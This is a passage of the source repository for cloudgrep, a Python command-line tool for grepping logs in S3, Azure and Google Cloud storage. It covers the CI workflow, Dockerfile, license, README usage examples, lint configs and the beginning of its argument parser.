├── .github └── workflows │ └── app-ci.yml ├── .gitignore ├── Dockerfile ├── LICENSE ├── README.md ├── ci ├── black.toml ├── flake8.cfg └── mypy.cfg ├── cloudgrep.py ├── cloudgrep ├── __init__.py ├── __main__.py ├── cloud.py ├── cloudgrep.py ├── queries.txt └── search.py ├── readme └── Diagram.png ├── release ├── generate_linux_binary.sh ├── generate_osx_binary.sh └── generate_windows_binary.bat ├── requirements.txt ├── setup.cfg ├── setup.py └── tests ├── __init__.py ├── data ├── 000000 ├── 000000.gz ├── 000000.zip ├── 14_3.log ├── 26688_17.log ├── 35010_7.log ├── UTF-8-Test.txt ├── UTF-8-test_filename_ŀĔ_TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ.txt ├── apache_access.log ├── azure.json ├── azure_singleline.json ├── bad_azure.json ├── bad_cloudtrail.json ├── cloudtrail.json ├── cloudtrail_singleline.json └── yara.rule └── test_unit.py /.github/workflows/app-ci.yml: -------------------------------------------------------------------------------- 1 | name: CI 2 | 3 | on: 4 | push: 5 | branches: [ "main" ] 6 | pull_request: 7 | branches: [ "main" ] 8 | 9 | permissions: 10 | contents: read 11 | 12 | jobs: 13 | default: 14 | runs-on: ubuntu-latest 15 | steps: 16 | - uses: actions/checkout@v3 17 | - name: Set up Python 18 | uses: actions/setup-python@v3 19 | with: 20 | python-version: '3.10' 21 | - name: Set up Environment 22 | run: | 23 | python -m pip install --upgrade pip --default-timeout=100 24 | pip3 install -r ./requirements.txt --default-timeout=100 25 | - name: Unit Tests 26 | run: | 27 | python3 -m unittest discover ./tests/ 28 | - name: Static Checks 29 | run: | 30 | pip3 install flake8 mypy --default-timeout=100 31 | mypy --config-file ./ci/mypy.cfg ./ 32 | flake8 --config ./ci/flake8.cfg 33 | echo If this fails run: python3 -m black . --config ./ci/black.toml 34 | # Skip - Behaves differently on local: python3 -m black . --config ./ci/black.toml --check 35 | python3 -m pip_audit -r requirements.txt 36 | 37 | compile-linux: 38 | runs-on: ubuntu-latest 39 | steps: 40 | - uses: actions/checkout@v3 41 | - name: Set up Python 42 | uses: actions/setup-python@v3 43 | with: 44 | python-version: '3.10' 45 | - name: Set up Environment 46 | run: | 47 | python -m pip install --upgrade pip --default-timeout=100 48 | pip3 install -r ./requirements.txt --default-timeout=100 49 | - name: Build & Run Binary 50 | run: | 51 | pip3 install pyinstaller 52 | chmod +x ./release/generate_linux_binary.sh 53 | ./release/generate_linux_binary.sh 54 | chmod +x ./dist/cloudgrep 55 | ./dist/cloudgrep -h # check it doesn't return non 0 exit status, i.e. crash 56 | - uses: actions/upload-artifact@v4 57 | with: 58 | name: dist-linux 59 | path: ./dist/* 60 | 61 | compile-windows: 62 | runs-on: windows-latest 63 | steps: 64 | - uses: actions/checkout@v3 65 | - name: Set up Python 66 | uses: actions/setup-python@v3 67 | with: 68 | python-version: '3.10' 69 | - name: Setup Environment 70 | run: | 71 | pip install -r ./requirements.txt 72 | pip install setuptools_rust 73 | pip install pyinstaller 74 | - name: Run cloudgrep Python 75 | run: | 76 | cd release 77 | ./generate_windows_binary.bat 78 | ./dist/cloudgrep.exe -h 79 | - uses: actions/upload-artifact@v4 80 | with: 81 | name: dist-windows 82 | path: ./release/dist/* 83 | 84 | compile-macos: 85 | runs-on: macos-15 86 | steps: 87 | - uses: actions/checkout@v3 88 | - name: Set up Python 89 | uses: actions/setup-python@v3 90 | with: 91 | python-version: '3.10' 92 | - name: Setup Environment 93 | run: | 94 | pip3 install -r ./requirements.txt 95 | - name: Run cloudgrep Python 96 | run: | 97 | pip3 install pyinstaller 98 | chmod +x ./release/generate_linux_binary.sh 99 | ./release/generate_linux_binary.sh 100 | chmod +x ./dist/cloudgrep 101 | ./dist/cloudgrep -h # check it doesn't return non 0 exit status, i.e. crash 102 | - uses: actions/upload-artifact@v4 103 | with: 104 | name: dist-osx 105 | path: ./dist/* 106 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | local_settings.py 60 | db.sqlite3 61 | db.sqlite3-journal 62 | 63 | # Flask stuff: 64 | instance/ 65 | .webassets-cache 66 | 67 | # Scrapy stuff: 68 | .scrapy 69 | 70 | # Sphinx documentation 71 | docs/_build/ 72 | 73 | # PyBuilder 74 | .pybuilder/ 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | # For a library or package, you might want to ignore these files since the code is 86 | # intended to run in multiple environments; otherwise, check them in: 87 | # .python-version 88 | 89 | # pipenv 90 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 91 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 92 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 93 | # install all needed dependencies. 94 | #Pipfile.lock 95 | 96 | # poetry 97 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 98 | # This is especially recommended for binary packages to ensure reproducibility, and is more 99 | # commonly ignored for libraries. 100 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 101 | #poetry.lock 102 | 103 | # pdm 104 | # Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. 105 | #pdm.lock 106 | # pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it 107 | # in version control. 108 | # https://pdm.fming.dev/#use-with-ide 109 | .pdm.toml 110 | 111 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 112 | __pypackages__/ 113 | 114 | # Celery stuff 115 | celerybeat-schedule 116 | celerybeat.pid 117 | 118 | # SageMath parsed files 119 | *.sage.py 120 | 121 | # Environments 122 | .env 123 | .venv 124 | env/ 125 | venv/ 126 | ENV/ 127 | env.bak/ 128 | venv.bak/ 129 | 130 | # Spyder project settings 131 | .spyderproject 132 | .spyproject 133 | 134 | # Rope project settings 135 | .ropeproject 136 | 137 | # mkdocs documentation 138 | /site 139 | 140 | # mypy 141 | .mypy_cache/ 142 | .dmypy.json 143 | dmypy.json 144 | 145 | # Pyre type checker 146 | .pyre/ 147 | 148 | # pytype static type analyzer 149 | .pytype/ 150 | 151 | # Cython debug symbols 152 | cython_debug/ 153 | 154 | # PyCharm 155 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 156 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 157 | # and can be added to the global gitignore or merged into this file. For a more nuclear 158 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 159 | #.idea/ 160 | 161 | queries.txt 162 | .vscode/settings.json 163 | valid_file.txt 164 | small.log 165 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update && \ 4 | apt install -y git && \ 5 | useradd -m cloudgrep && \ 6 | chown -R cloudgrep: /home/cloudgrep 7 | 8 | USER cloudgrep 9 | WORKDIR /home/cloudgrep 10 | 11 | RUN cd /home/cloudgrep && \ 12 | git clone https://github.com/cado-security/cloudgrep.git && \ 13 | cd cloudgrep && \ 14 | pip install -r requirements.txt 15 | 16 | ENTRYPOINT ["python3", "/home/cloudgrep/cloudgrep/cloudgrep.py"] 17 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # cloudgrep # 2 | cloudgrep searches cloud storage. 3 | 4 | ![ci](https://github.com/cado-security/cloudgrep/actions/workflows/app-ci.yml/badge.svg?branch=main) [![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) 5 | 6 | 7 | It currently supports searching log files, optionally compressed with gzip (.gz) or zip (.zip), in AWS S3, Azure Storage or Google Cloud Storage. 8 | 9 | ![Diagram](readme/Diagram.png "Diagram") 10 | 11 | ### Why? ### 12 | - Directly searching cloud storage, without indexing logs into a SIEM or Log Analysis tool, can be faster and cheaper. 13 | - There is no need to wait for logs to be ingested, indexed, and made available for searching. 14 | - It searches files in parallel for speed. 15 | - This may be of use when debugging applications, or investigating a security incident. 16 | 17 | ### Example ### 18 | 19 | Simple example: 20 | ``` 21 | ./cloudgrep --bucket test-s3-access-logs --query 9RXXKPREHHTFQD77 22 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 23 | ``` 24 | 25 | Simple Azure example: 26 | ``` 27 | python3 cloudgrep.py -an some_account -cn some_container -q my_search 28 | ``` 29 | 30 | Simple Google example: 31 | ``` 32 | python3 cloudgrep.py -gb my-gcp-bucket -q my_search 33 | ``` 34 | 35 | Simple CloudTrail log example, outputting results as JSON: 36 | ``` 37 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 -lt cloudtrail -jo 38 | ``` 39 | 40 | Simple custom log example: 41 | ``` 42 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 -lf json -lp Records 43 | ``` 44 | 45 | More complicated example: 46 | ``` 47 | python3 cloudgrep.py -b test-s3-access-logs --prefix "logs/" --filename ".log" -q 9RXXKPREHHTFQD77 -s "2023-01-09 20:30:00" -e "2023-01-09 20:45:00" --file_size 10000 --debug 48 | ``` 49 | 50 | Saving the output to a file: 51 | ``` 52 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 --hide_filenames > matching_events.log 53 | ``` 54 | 55 | Example output: 56 | ``` 57 | [2023-11-30 13:37:12,416] - Bucket is in region: us-east-2 : Search from the same region to avoid egress charges. 58 | [2023-11-30 13:37:12,417] - Searching 11 files in test-s3-access-logs for 9RXXKPREHHTFQD77... 59 | {"key_name": "access2023-01-09-20-34-20-EAC533CB93B4ACBE", "line": "abbd82b5ad5dc5d024cd1841d19c0cf2fd7472c47a1501ececde37fe91adc510 bucket-72561-s3bucketalt-1my9piwesfim7 [09/Jan/2023:19:20:00 +0000] 1.125.222.333 arn:aws:sts::000011110470:assumed-role/bucket-72561-myResponseRole-1WP2IOKDV7B4Y/1673265251.340187 9RXXKPREHHTFQD77 REST.GET.BUCKET - \"GET /?list-type=2&prefix=-collector%2Fproject-&start-after=&encoding-type=url HTTP/1.1\" 200 - 946 - 33 32 \"-\" \"Boto3/1.21.24 Python/3.9.2 Linux/5.10.0-10-cloud-amd64 Botocore/1.24.46\" - aNPuHKw== SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader bucket-72561-s3bucketalt-1my9piwesfim7.s3.us-east-2.amazonaws.com TLSv1.2 - -"} 60 | ``` 61 | 62 | ### Arguments ### 63 | ``` 64 | usage: cloudgrep.py [-h] [-b BUCKET] [-an ACCOUNT_NAME] [-cn CONTAINER_NAME] [-gb GOOGLE_BUCKET] [-q QUERY] 65 | [-v FILE] [-y YARA] [-p PREFIX] [-f FILENAME] [-s START_DATE] [-e END_DATE] 66 | [-fs FILE_SIZE] [-pr PROFILE] [-d] [-hf] [-lt LOG_TYPE] [-lf LOG_FORMAT] 67 | [-lp LOG_PROPERTIES] [-jo JSON_OUTPUT] 68 | 69 | CloudGrep searches is grep for cloud storage like S3 and Azure Storage. Version: 1.0.5 70 | 71 | options: 72 | -h, --help show this help message and exit 73 | -b BUCKET, --bucket BUCKET 74 | AWS S3 Bucket to search. E.g. my-bucket 75 | -an ACCOUNT_NAME, --account-name ACCOUNT_NAME 76 | Azure Account Name to Search 77 | -cn CONTAINER_NAME, --container-name CONTAINER_NAME 78 | Azure Container Name to Search 79 | -gb GOOGLE_BUCKET, --google-bucket GOOGLE_BUCKET 80 | Google Cloud Bucket to Search 81 | -q QUERY, --query QUERY 82 | Text to search for. Will be parsed as a Regex. E.g. example.com 83 | -v FILE, --file FILE File containing a list of words or regular expressions to search for. One per line. 84 | -y YARA, --yara YARA File containing Yara rules to scan files. 85 | -p PREFIX, --prefix PREFIX 86 | Optionally filter on the start of the Object name. E.g. logs/ 87 | -f FILENAME, --filename FILENAME 88 | Optionally filter on Objects that match a keyword. E.g. .log.gz 89 | -s START_DATE, --start_date START_DATE 90 | Optionally filter on Objects modified after a Date or Time. E.g. 2022-01-01 91 | -e END_DATE, --end_date END_DATE 92 | Optionally filter on Objects modified before a Date or Time. E.g. 2022-01-01 93 | -fs FILE_SIZE, --file_size FILE_SIZE 94 | Optionally filter on Objects smaller than a file size, in bytes. Defaults to 100 Mb. 95 | -pr PROFILE, --profile PROFILE 96 | Set an AWS profile to use. E.g. default, dev, prod. 97 | -d, --debug Enable Debug logging. 98 | -hf, --hide_filenames 99 | Dont show matching filenames. 100 | -lt LOG_TYPE, --log_type LOG_TYPE 101 | Return individual matching log entries based on pre-defined log types, otherwise 102 | custom log_format and log_properties can be used. E.g. cloudtrail. 103 | -lf LOG_FORMAT, --log_format LOG_FORMAT 104 | Define custom log format of raw file to parse before applying search logic. Used if 105 | --log_type is not defined. E.g. json. 106 | -lp LOG_PROPERTIES, --log_properties LOG_PROPERTIES 107 | Define custom list of properties to traverse to dynamically extract final list of log 108 | records. Used if --log_type is not defined. E.g. [Records]. 109 | -jo JSON_OUTPUT, --json_output JSON_OUTPUT 110 | Output as JSON. 111 | 112 | ``` 113 | 114 | ### Deployment ### 115 | 116 | Install with: 117 | ``` pip3 install -r requirements.txt ``` 118 | Or download the latest compiled release [here](https://github.com/cado-security/cloudgrep/releases/tag/Latest) 119 | 120 | You can run this from your local laptop, or from a virtual machine in your cloud provider. 121 | 122 | This requires python3.10 or later 123 | 124 | #### Docker #### 125 | 126 | Build with: 127 | ``` docker build -t cloudgrep . ``` 128 | 129 | Run with: 130 | ``` docker run --rm -ti cloudgrep ``` 131 | 132 | To pass environment variables, e.g. for AWS: 133 | ``` docker run --rm --env-file <(env|grep AWS) -ti cloudgrep``` 134 | 135 | ### Running in your Cloud and Authentication ### 136 | 137 | #### AWS #### 138 | Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to [configure the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html). 139 | If you are running on an EC2, an [Instance Profile](https://devopscube.com/aws-iam-role-instance-profile/) is likely the best choice. 140 | 141 | If you run on an EC2 instance in the same region as the S3 bucket with a [VPC endpoint for S3](https://aws.amazon.com/blogs/architecture/overview-of-data-transfer-costs-for-common-architectures/) you can [avoid egress charges](https://awsmadeeasy.com/blog/aws-s3-vpc-endpoint-transfer-cost-reduction/). 142 | You can authenticate in a [number of ways](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html). 143 | 144 | #### Azure #### 145 | The simplest way to authenticate with Azure is to first run: 146 | ``` 147 | az login 148 | ``` 149 | This will open a browser window and prompt you to login to Azure. 150 | 151 | #### GCP #### 152 | You will need to create a service account and download the credentials file then set with: 153 | ``` 154 | export GOOGLE_APPLICATION_CREDENTIALS="/Users/creds.json" 155 | ``` 156 | 157 | ### Contributions ### 158 | We welcome any contributions to this project! Please add via a Pull Request. 159 | 160 | Possible future work could include: 161 | - Support for zstd compression 162 | - Log parsing and detection using grok patterns, Sigma, Yara or a file of Regex queries 163 | - Export parsed logs in a standard syslog format 164 | 165 | ### Help ### 166 | Please open a GitHub issue if you have any questions or suggestions. 167 | This is not an officially supported [Cado Security](https://www.cadosecurity.com/) product. 168 | -------------------------------------------------------------------------------- /ci/black.toml: -------------------------------------------------------------------------------- 1 | [tool.black] 2 | 3 | line-length = 120 4 | -------------------------------------------------------------------------------- /ci/flake8.cfg: -------------------------------------------------------------------------------- 1 | [flake8] 2 | # Maximium cyclomatic complexity 3 | max-complexity = 20 4 | exclude = s3cmd,efs-utils,generated 5 | select = 6 | F, 7 | B, 8 | T, 9 | S, 10 | ignore = 11 | # Line too long 12 | E501, 13 | # unexpected spaces around keyword / parameter equals 14 | E251, 15 | # too many leading '#' for block comment 16 | E266, 17 | # blank line contains whitespace 18 | W293, 19 | # expected 2 blank lines, found 1 20 | E302, 21 | # at least two spaces before inline comment 22 | E261, 23 | # whitespace before ']' 24 | E202, 25 | # whitespace after '[' 26 | E201, 27 | # trailing whitespace 28 | W291, 29 | # whitespace before : 30 | E203, 31 | # block comment should start with '# ' 32 | E265, 33 | # too many blank lines (2) 34 | E303, 35 | # missing whitespace around operator 36 | E225, 37 | # line break before binary operator 38 | W503, 39 | # insecure use of temp file/dir, noisy and not a big deal for us 40 | S108, 41 | # need to allow subprocess 42 | S404, 43 | # need to allow subprocess 44 | S603, 45 | # Unable to detect undefined names due to * import 46 | F403, 47 | application_import_names = core,tests 48 | import-order-style=pep8 -------------------------------------------------------------------------------- /ci/mypy.cfg: -------------------------------------------------------------------------------- 1 | [mypy] 2 | show_column_numbers = True 3 | follow_imports = silent 4 | disallow_untyped_defs = True 5 | exclude = binaries 6 | 7 | [mypy-timeout_decorator] 8 | ignore_missing_imports = True 9 | 10 | 11 | [mypy-moto] 12 | ignore_missing_imports = True 13 | -------------------------------------------------------------------------------- /cloudgrep.py: -------------------------------------------------------------------------------- 1 | from cloudgrep import __main__ 2 | 3 | __main__.main() 4 | -------------------------------------------------------------------------------- /cloudgrep/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/cloudgrep/__init__.py -------------------------------------------------------------------------------- /cloudgrep/__main__.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import logging 3 | import sys 4 | from typing import List, Optional 5 | import dateutil.parser 6 | import datetime 7 | 8 | from cloudgrep.cloudgrep import CloudGrep 9 | 10 | VERSION = "1.0.5" 11 | 12 | 13 | def list_of_strings(arg: str) -> List[str]: 14 | """Parse a comma‐separated string into a list of nonempty strings.""" 15 | return [s.strip() for s in arg.split(",") if s.strip()] 16 | 17 | 18 | def main() -> None: 19 | parser = argparse.ArgumentParser( 20 | description=f"CloudGrep: grep for cloud storage (S3, Azure, Google Cloud). Version: {VERSION}" 21 | ) 22 | parser.add_argument("-b", "--bucket", help="AWS S3 Bucket to search (e.g. my-bucket)") 23 | parser.add_argument("-an", "--account-name", help="Azure Account Name to search") 24 | parser.add_argument("-cn", "--container-name", help="Azure Container Name to search") 25 | parser.add_argument("-gb", "--google-bucket", help="Google Cloud Bucket to search") 26 | parser.add_argument("-q", "--query", type=list_of_strings, help="Comma-separated list of regex patterns to search") 27 | parser.add_argument("-v", "--file", help="File containing queries (one per line)") 28 | parser.add_argument("-y", "--yara", help="File containing Yara rules") 29 | parser.add_argument("-p", "--prefix", default="", help="Filter objects by prefix (e.g. logs/)") 30 | parser.add_argument("-f", "--filename", help="Filter objects whose names contain a keyword (e.g. .log.gz)") 31 | parser.add_argument("-s", "--start_date", help="Filter objects modified after this date (YYYY-MM-DD)") 32 | parser.add_argument("-e", "--end_date", help="Filter objects modified before this date (YYYY-MM-DD)") 33 | parser.add_argument( 34 | "-fs", 35 | "--file_size", 36 | type=int, 37 | default=100_000_000, 38 | help="Max file size in bytes (default: 100MB)", 39 | ) 40 | parser.add_argument("-pr", "--profile", help="AWS profile to use (e.g. default, dev, prod)") 41 | parser.add_argument("-d", "--debug", action="store_true", help="Enable debug logging") 42 | parser.add_argument("-hf", "--hide_filenames", action="store_true", help="Hide filenames in output") 43 | parser.add_argument("-lt", "--log_type", help="Pre-defined log type (e.g. cloudtrail, azure)") 44 | parser.add_argument("-lf", "--log_format", help="Custom log format (e.g. json, csv)") 45 | parser.add_argument( 46 | "-lp", "--log_properties", type=list_of_strings, help="Comma-separated list of log properties to extract" 47 | ) 48 | parser.add_argument("-jo", "--json_output", action="store_true", help="Output results in JSON format") 49 | args = parser.parse_args() 50 | 51 | if len(sys.argv) == 1: 52 | parser.print_help(sys.stderr) 53 | sys.exit(1) 54 | 55 | # Parse dates (if provided) into datetime objects 56 | start_date: Optional["datetime.datetime"] = dateutil.parser.parse(args.start_date) if args.start_date else None 57 | end_date: Optional["datetime.datetime"] = dateutil.parser.parse(args.end_date) if args.end_date else None 58 | 59 | # Configure logging 60 | if args.debug: 61 | logging.basicConfig(format="[%(asctime)s] [%(levelname)s] %(message)s", level=logging.DEBUG) 62 | else: 63 | logging.basicConfig(format="[%(asctime)s] %(message)s", level=logging.WARNING) 64 | logging.getLogger("urllib3.connectionpool").setLevel(logging.ERROR) 65 | 66 | CloudGrep().search( 67 | bucket=args.bucket, 68 | account_name=args.account_name, 69 | container_name=args.container_name, 70 | google_bucket=args.google_bucket, 71 | query=args.query, 72 | file=args.file, 73 | 